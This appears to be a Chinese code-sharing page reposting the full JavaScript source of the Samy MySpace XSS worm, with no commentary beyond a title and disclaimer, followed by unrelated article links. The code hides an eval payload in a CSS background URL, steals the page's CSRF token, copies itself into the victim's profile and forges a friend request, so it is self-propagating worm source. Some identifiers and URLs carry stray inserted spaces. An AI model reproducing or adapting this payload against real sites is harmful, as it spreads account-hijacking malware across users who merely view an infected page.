Samy 蠕虫代码
2015-11-02 16:13
411 查看
<div id=mycode style=”BACKGROUND: url('javascript:eval(document.all.mycode.expr)')”
expr=”
var B = String.fromCharCode(34);
var A = String.fromCharCode(39);
function g() {
var C;
try {
var D = document.body.createTextRange();
C = D.htmlText
} catch (e) {}
if (C) {
return C
} else {
return
eval('document.body.innerHTML')
}
}
function getFromURL(BF, BG) {
var T;
if (BG == 'Mytoken') {
T = B
} else {
T = ' & '
}
var U = BG + ' = ';
var V = BF.indexOf(U) + U.length;
var W = BF.substring(V, V + 1024);
var X = W.indexOf(T);
var Y = W.substring(0, X);
return Y
}
function getData(AU) {
M = getFromURL(AU, 'friendID');
L = getFromURL(AU, 'Mytoken')
}
function getQueryParams() {
var E = document.location.search;
var F = E.substring(1, E.length).split(' & ');
var AS = new Array();
for (var O = 0; O < F.length; O++) {
var I = F[O].split(' = ');
AS[I[0]] = I[1]
}
return AS
}
var J;
var AS = getQueryParams();
var L = AS['Mytoken'];
var M = AS['friendID'];
if (location.hostname == 'profile.myspace.com') {
document.location = 'http: //www.myspace.com' + location.pathname + location.search
} else {
if (!M) {
getData(g())
}
main()
}
function getClientFID() {
return findIn(g(), 'up_launchIC(' + A, A)
}
function nothing() {}
function paramsToString(AV) {
var N = new String();
var O = 0;
for (var P in AV) {
if (O > 0) {
N += ' & '
}
var Q = escape(AV[P]);
while (Q.indexOf(' + ') != -1) {
Q = Q.replace(' + ', ' % 2B')
}
while (Q.indexOf(' & ') != -1) {
Q = Q.replace(' & ', ' % 26')
}
N += P + ' = ' + Q;
O++
}
return N
}
function httpSend(BH, BI, BJ, BK) {
if (!J) {
return false
}
eval('J.onr' + 'eadystatechange = BI');
J.open(BJ, BH, true);
if (BJ == 'POST') {
J.setRequestHeader('Content - Type', 'application / x - www - form - urlencoded');
J.setRequestHeader('Content - Length', BK.length)
}
J.send(BK);
return true
}
function findIn(BF, BB, BC) {
var R = BF.indexOf(BB) + BB.length;
var S = BF.substring(R, R + 1024);
return S.substring(0, S.indexOf(BC))
}
function getHiddenParameter(BF, BG) {
return findIn(BF, 'name = ' + B + BG + B + 'value = ' + B, B)
}
function getXMLObj() {
var Z = false;
if (window.XMLHttpRequest) {
try {
Z = new XMLHttpRe - quest()
}
catch(e) {
Z = false
}
} else if (window.ActiveXObject) {
try {
Z = new ActiveXOb - ject('Msxml2.XMLHTTP')
} catch (e) {
try {
Z = new ActiveXOb - ject('Microsoft.XMLHTTP')
} catch (e) {
Z = false
}
}
}
return Z
}
var AA = g();
var AB = AA.indexOf('m' + 'ycode');
var AC = AA.substring(AB, AB + 4096);
var AD = AC.indexOf('D' + 'IV');
var AE = AC.substring(0, AD);
var AF;
if (AE) {
AE = AE.replace('jav' + 'a', A + 'jav' + 'a');
AE = AE.replace('exp' + 'r)', 'exp' + 'r)' + A);
AF = 'but most of all,samy is my hero. < d' + 'iv id = ' + AE + 'D' + 'IV > '
}
var AG;
function getHome() {
if (J.readySt
ate != 4) {
return
}
var AU = J.responseText;
AG = findIn(AU, 'P' + 'rofileHeroes', ' < /td>');
AG = AG.substring(61, AG.length);
if (AG.indexOf('samy') == -1) {
if (AF) {
AG += AF;
var AR = getFromURL(AU, 'Mytoken');
var AS = new Ar - ray();
AS['interestLabel'] = 'heroes';
AS['submit'] = 'Preview';
AS['interest'] = AG;
J = getXMLObj();
httpSend('/index.cfm ? fuseaction = profile.previewInterests & Mytoken = ' + AR, postHero,
'POST', paramsToString(AS))
}
}
}
function postHero() {
if (J.readyState != 4) {
return
}
var AU = J.responseText;
var AR = getFromURL(AU, 'Mytoken');
var AS = new Ar - ray();
AS['interestLabel'] = 'heroes';
AS['submit'] = 'Submit';
AS['interest'] = AG;
AS['hash'] = getHiddenParame - ter(AU, 'hash');
httpSend(' / index.cfm ? fuseaction = profile.processInterests & Mytoken = ' + AR, nothing, 'POST',
paramsToString(AS))
}
function main() {
var AN = getClientFID();
var BH = ' / index.cfm ? fuseaction = user.
viewProfile & friendID = ' + AN + ' & Mytoken = ' + L;
J = getXMLObj();
httpSend(BH, getHome, 'GET');
xmlhttp2 = getXMLObj();
httpSend2(' / index.cfm ? fuseaction = invite.addfriend_verify & friendID = 11851658 & Mytoken = ' + L,
processxForm, 'GET')
}
function processx - Form() {
if (xmlhttp2.readyState != 4) {
return
}
var AU = xmlhttp2.responseText;
var AQ = getHiddenParameter(AU, 'hashcode');
var AR = getFromURL(AU, 'Mytoken');
var AS = new Array();
AS['hashcode'] = AQ;
AS['friendID'] = '11851658';
AS['submit'] = 'Add to Friends';
httpSend2(' / index.cfm ? fuseaction = invite.addFriendsProcess & Mytoken = ' + AR, nothing, 'POST',
paramsToString(AS))
}
function httpSend2(BH, BI, BJ, BK) {
if (!xmlhttp2) {
return false
}
eval('xmlhttp2.onr' + 'eadystatechange = BI');
xmlhttp2.open(BJ, BH, true);
if (BJ == 'POST') {
xmlhttp2.setRe
questHeader('Content - Type', 'application / x - www - form - urlencoded');
xmlhttp2.setReques
tHeader('Content - Length', BK.length)
}
xmlhttp2.send(BK);
return true
}
”></DIV>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 第8周项目3 顺序串算法
- java反射工具类
- php闭包函数简析
- 黑马程序员———C语言 分支语句和循环语句
- c#基础4
- python实现拷贝指定文件到指定目录
- JDK所有旧版本在官网中的下载地址
- (C++)字符串分割
- VS2010、C#、Emgu CV配置 ; 在C#下使用OpenCV ; C#中使用OpenCV(Emgu CV)
- Eclipse移植项目时JDK版本不匹配Project facet Java version 1.7 is not supported
- Java枚举
- AJax+springMVC+JQURY.GET--注册界面即时刷新用户名是否存在
- 我的JAVA学习之路
- emacs中c++程序编译执行
- java 布尔值一种赋值方法
- 2015-11-2 【项目1 - 二叉树算法库】
- c语言预编译
- C语言6章循环结构
- ADT和SDK版本不一致导致的问题
- 求最大子串和